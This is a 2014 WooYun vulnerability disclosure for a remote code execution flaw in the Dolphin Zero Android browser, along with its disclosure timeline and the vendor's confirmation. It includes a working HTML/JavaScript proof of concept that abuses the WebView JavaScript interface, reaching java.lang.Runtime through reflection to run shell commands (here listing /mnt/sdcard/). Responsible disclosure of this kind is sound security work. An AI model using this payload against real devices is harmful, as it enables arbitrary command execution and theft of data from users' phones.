当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050162

漏洞标题:dolphin zero APP远程代码执行漏洞

相关厂商:海豚浏览器

漏洞作者: 飞扬风

提交时间:2014-02-27 12:12

修复时间:2014-05-28 12:13

公开时间:2014-05-28 12:13

漏洞类型:远程代码执行

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-27: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-07: 细节向第三方安全合作伙伴开放
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

dolphin zero是海豚浏览器团队出品的一款私密浏览器,自动清除浏览数据。

详细说明:

还是android webview接口问题
问题产生原因详见:http://drops.wooyun.org/papers/548

漏洞证明:

QQ图片20140201143559.jpg


测试代码
<html>
<head>
<script>
var i=0;

function getContents(inputStream)
{
var contents = ""+i;
var b = inputStream.read();
var i = 1;
while(b != -1) {
var bString = String.fromCharCode(b);
contents += bString;
b = inputStream.read();
}
i=i+1;
return contents;
}

function execute(cmdArgs)
{
for (var obj in window) {
if ("getClass" in window[obj]) {
alert(obj);
return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
}
}

var p = execute(["ls","/mnt/sdcard/"]);
document.write(getContents(p.getInputStream()));
</script>
</head>
<body>
Test WebView
</body>
</html>


QQ图片20140201143607.jpg

修复方案:

你们懂得~~~

版权声明:转载请注明来源 飞扬风@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-03-04 14:58

厂商回复:

已确认,处理中,感谢飞扬风的提交~

最新状态:

暂无


漏洞评价:

评论